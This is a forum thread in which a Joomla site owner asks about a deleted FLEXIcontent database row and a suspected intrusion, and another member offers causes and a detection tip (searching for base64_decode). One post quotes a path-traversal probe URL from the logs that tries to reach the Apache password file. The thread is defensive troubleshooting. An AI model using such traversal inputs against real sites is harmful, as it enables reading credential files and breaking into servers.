Flexi Component entry removed

More
13 years 11 months ago #7043 by gnomeontherun
Flexi Component entry removed was created by gnomeontherun
I have possibly survived a hacking attempt, assessing the situation. The only thing that alerted me to attempt was that the site was borked, but that was because the row for Flexi in the components table was removed. I didn't do it, but somehow it happened. It *appears* to be the only issue I've uncovered.

Any ideas? I see a lot of post requests to the admin (blind password attempts) and a few carefully molded uris related to Flexi, but all returned 404.

Please Log in or Create an account to join the conversation.

More
13 years 11 months ago #7048 by kenmcd
Replied by kenmcd on topic Flexi Component entry removed
.
Quite odd. Worth investigating further.

The only way someone could delete that row in the database is to:
- have access to the database, or
- run the FLEXIcontent un-install script, or
- ??

What are the "molded URIs" you are seeing in the logs?


.
AllMedia4Joomla Project
Download AllMedia YouTube Feed Gallery module

Please Log in or Create an account to join the conversation.

More
13 years 11 months ago #7071 by gnomeontherun
Replied by gnomeontherun on topic Flexi Component entry removed
The strange urls I saw were trying to call the base password apache file like

index.php?option=com_flexicontent&controler=../../../../../#passfile

I know, its very bizzare. How does the db row get removed, but all files and the rest of the flexi tables not? So far, no luck figuring out what the issue was, not with my host either. Just very...odd.

Please Log in or Create an account to join the conversation.

More
13 years 11 months ago #7088 by kenmcd
Replied by kenmcd on topic Flexi Component entry removed
.

Hmmmm. . . there is a hack going around which has not yet been fully explained.
At first it was thought to be only WordPress sites, then added Joomla sites, and now it appears it is not related to the specific application but the hosting service.

They gain access to the website and add some code to every file, and then delete their tracks.
Have you found any odd files or modified files?
The files have base64 encoded code so a search for "base64_decode" finds the code.
Some users have downloaded all their website files and run a search locally within those files.

Since it is actually a server hack, your example URL would seem to fit.
Appears they are actually trying to get access to the server.

This is being discussed in the Joomla security forum, and on the WordPress website, and on some security websites ( blog.sucuri.net/ ).
It may be related to a hosting configuration.
GoDaddy and a couple others have been particularly hard hit.

But this still does not explain the one row deleted from the database. :?

.
AllMedia4Joomla Project
Download AllMedia YouTube Feed Gallery module

Please Log in or Create an account to join the conversation.

Moderators: vistamediajoomlacornerggppdk
Time to create page: 0.269 seconds

Last FLEXI-site

Last Faq articles

Newsletter

Last Tutos about FLEXIcontent

Login

Save
Cookies user preferences
We use cookies to ensure you to get the best experience on our website. If you decline the use of cookies, this website may not function as expected.
Accept all
Decline all
Essential
These cookies are needed to make the website work correctly. You can not disable them.
Display
Accept
Analytics
Tools used to analyze the data to measure the effectiveness of a website and to understand how it works.
Google Analytics
Accept
Decline